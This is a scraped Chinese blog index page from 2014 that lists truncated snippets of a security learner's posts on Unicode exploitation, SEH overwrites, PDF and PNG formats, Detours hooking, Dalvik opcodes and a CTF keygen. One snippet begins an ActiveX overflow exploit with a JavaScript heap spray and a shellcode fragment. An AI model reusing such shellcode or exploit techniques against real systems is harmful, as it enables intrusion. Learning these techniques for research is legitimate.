- 博客(14)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 unicode exp学习
UNICODE 会自动插入NULL字符 1)覆盖ret控制寻找 形似 0x00nn00mm 的 jmp xxx 的地址 可以jmo 到shellcode执行2)基于SEH 控制EIP+SHORT JMP寻找 pop pop ret 不包含>7f 的入口地址 用来覆盖SEH header先将 nseh 置为 \xcc\xcc 再来寻找 两字节的 sho
2014-05-28 19:31:43
1775
转载 zlib的安装与使用
转载于 http://blog.csdn.net/htttw/article/details/7616124zlib的安装与使用zlib是一个很好的压缩解压缩库,今天我们分别介绍如何在Linux与Windows上安装与使用:一:Linux平台首先看看自己的机器上是不是已经安装好zlib了:wher
2014-05-28 11:08:09
1619
翻译 PDF 学习
%PDF-1.11 0 obj<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 7 0 R>>endobj2 0 obj<< /Type /Outlines /Count 0>>endobj3 0 obj<< /Type /Pages /Kids [4 0 R] /Count 1>>
2014-05-27 13:17:27
1413
原创 MW6MaxiCode ACX溢出
var nop = unescape("%u9090"); var shellcode= "\u68fc\ubcc9\u6ba6\u6368\ud189\u8b4f\u8df4\uf47e"+"\udb33\u04b7\ue32b\ud233\u8b64\u305a\u4b8b\u8b0c"+"\u1c49\u098b\u518b\u8b18\u3452\ufa80\u7433\u8b
2014-05-24 16:50:32
1628
原创 activeX控件学习
ActiveX是Microsoft对于一系列策略性面向对象程序技术和工具的称呼,其中主要的技术是组件对象模型(COM)。在有目录和其它支持的网络中,COM变成了分布式COM(DCOM)。通过y
2014-05-22 23:01:36
1009
转载 PNG格式
0x1. 组成PNG图像格式文件(或者称为数据流)由一个8字节的PNG文件署名(PNG file signature)域 ( 89 50 4e 47 0d 0a 1a 0a按照特定结构组织的3个以上的数据块(chunk)组成。0x2. 文件署名前8个字节为文件署名域0x3. 数据块
2014-05-14 20:57:05
677
转载 win7 Detours Express 3.0
Detours是微软开发的一个函数库,可用于捕获系统API。在用其进行程序开发之前,得做一些准备工作:一.下载Detours 在http://research.microsoft.com/sn/detours 可免费下载Detours,当前的最新版本是Detours Express 2.1 isavailable for immediate download under a n
2014-05-14 17:51:17
1023
转载 Dalvik虚拟机操作码
Dalvik虚拟机操作码作者:Gabor Paller 翻译:YULIANGMAXv1.0表中的vx、vy、vz表示某个Dalvik寄存器。根据不同指令可以访问16、256或64K寄存器。表中lit4、lit8、lit16、lit32、lit64表示字面值(直接赋值),数字是值所占用位的长度。long和double型的值占用两个寄存器,例:一个在v0寄
2014-05-13 11:49:58
904
原创 ISCC-逃离临淄-注册机
逃离临淄Category:文公传奇→5 Passed/Submitted: 26/114 Score: 200齐桓公去世,齐国大乱,重耳为避免危险也被迫离开齐国国都临淄城,然而齐桓公去世以前,就下令城门关闭,关闭时间为20140801,但是现在已经时间已过,城门关闭。但是作为重耳的手下,你一定有方法让重耳在过期时间20140801之后也能顺利通过出城的注册审核,顺利出城。假设重耳使
2014-05-09 17:50:20
1592
Apple_Debugging_and_Reverse_Engineering_v3.0.html
2020-03-01
pageheap内存纠错
2014-08-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人